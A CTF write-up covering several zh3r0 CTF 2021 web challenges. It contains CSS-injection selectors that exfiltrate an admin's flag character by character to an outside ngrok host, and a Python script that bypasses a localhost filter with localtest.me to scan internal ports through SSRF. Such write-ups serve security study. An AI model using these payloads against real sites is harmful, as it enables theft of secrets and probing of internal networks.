Tags: web xss 


# Web challenge write-ups

Combining these web challenges into one document since I don't feel like making
detailed write-ups.

## Flags

**Category**: web \
**Solves**: 20 \
**Points**: 871 \
**Author**: navy

Here is a website where each user gets a flag. However, only the admin has the
correct flag. Can you guess it?

Mirror 1 - http://web.zh3r0.cf:4444 \
Mirror 2 - http://web.zh3r0.cf:4321 \
Download - [Flags.tar.gz](Flags.tar.gz)

### Solution

> Solved with @anirudhb, who did most of the work

<meta http-equiv='Content-Security-Policy' content="script-src 'nonce-<%=bytes%>'; object-src 'none'; base-uri 'none'require-trusted-types-for 'script'; frame-src 'none'">
<div class="flagDisplay">

Your flag is

<%- flagProfile %>
<div class="form">
<form action="/check" method="post">
<legend>Check if your flag matches the admin's</legend>
<div class="flag">
<input type="flag" name="flag" value="<%= flag %>">
<button type="submit" name="submit" value="submit">Check</button>

We have reflected HTML in `flagProfile`. Our goal is to exfiltrate the admins
flag from

<input type="flag" name="flag" value="<%= flag %>">.

Script execution is blocked by CSP, but we can inject CSS to leak characters
one by one:
.flag { display: block !important; }
input[value^="zh3r0{a"] { background-image: url(http://d92615501434.ngrok.io/a); }
input[value^="zh3r0{b"] { background-image: url(http://d92615501434.ngrok.io/b); }
input[value^="zh3r0{c"] { background-image: url(http://d92615501434.ngrok.io/c); }
input[value^="zh3r0{8"] { background-image: url(http://d92615501434.ngrok.io/8); }
input[value^="zh3r0{9"] { background-image: url(http://d92615501434.ngrok.io/9); }
input[value^="zh3r0{_"] { background-image: url(http://d92615501434.ngrok.io/_); }
input[value^="zh3r0{{"] { background-image: url(http://d92615501434.ngrok.io/%7B); }
input[value^="zh3r0{}"] { background-image: url(http://d92615501434.ngrok.io/%7D); }

Unfortunately the challenge organizers really messed up the infra on this one.
I would constantly be logged out for no reason, making it annoying to test the
exploit. Also why did they have to make the flag so long?

Solve script in `flags_solve.py`

## Original Store

**Category**: web \
**Solves**: 22 \
**Points**: 842 \
**Author**: DreyAnd

Hi! Check out our car dealership platform - the Original Store at
[Store]( We also have a contest running right now
and who has the best car wins! You can send us your car's images at

## Solution

Sourceless XSS challenge. After some 20 min of guessing I found an unintended solution



For reference,
[Carmen San Diego](https://gist.github.com/bluepichu/6898d0f15f9b58ba5a0571213c3896a2)
from [PlaidCTF 2021](https://ctftime.org/event/1199) had the same unintended

> Author's intended solution: https://dreyand.github.io/zh3r0-ctfv2/original-store/

## Original Store v2

**Category**: web \
**Solves**: 20 \
**Points**: 871 \
**Author**: DreyAnd

## Overview

Exactly the same as the previous one, except now the cookie is `HttpOnly:
true`. Fortunately(?) this doesn't fix the unintended solution:

## Solution



## Baby SSRF

**Category**: web \
**Solves**: 40 \
**Points**: 453 \
**Author**: ZyperX

Yet another server challenge :)

Link - http://web.zh3r0.cf:6969

## Solution

> Solved with @anirudhb

Weird challenge with no source provided. There's a page where you can request a
URL and get the headers returned. For some reason `localhost` is blocked, but
that's easily bypassed using `http://localtest.me` or a 302 redirect.

We guessed that we had to scan ports on `localhost` and the flag would
magically appear in the header.

Unfortunately, my connection is super slow so I just rented a VPS in India
which scanned 5000 ports in under a minute:

import requests
import sys

chall_url = "http://web.zh3r0.cf:6969"
redir_url = "http://localtest.me"

def check_port(port: int):
data = {"url": f"{redir_url}/{port}"}
res = requests.post(f"{chall_url}/request", data)
return res.text

start = int(sys.argv[1])
end = int(sys.argv[2])

for port in range(start, end):
print(f"[*] Checking port {port}")
html = check_port(port)
if "Learn about URL" not in html:
print(f"[+] Found something on {port}")
print(f"[*] HTML: {html}")
open(f"port_{port}.txt", "w").write(html)

Turns out the port was 9006.


Original writeup (https://github.com/qxxxb/ctf/tree/master/2021/zh3r0_ctf/web#flags).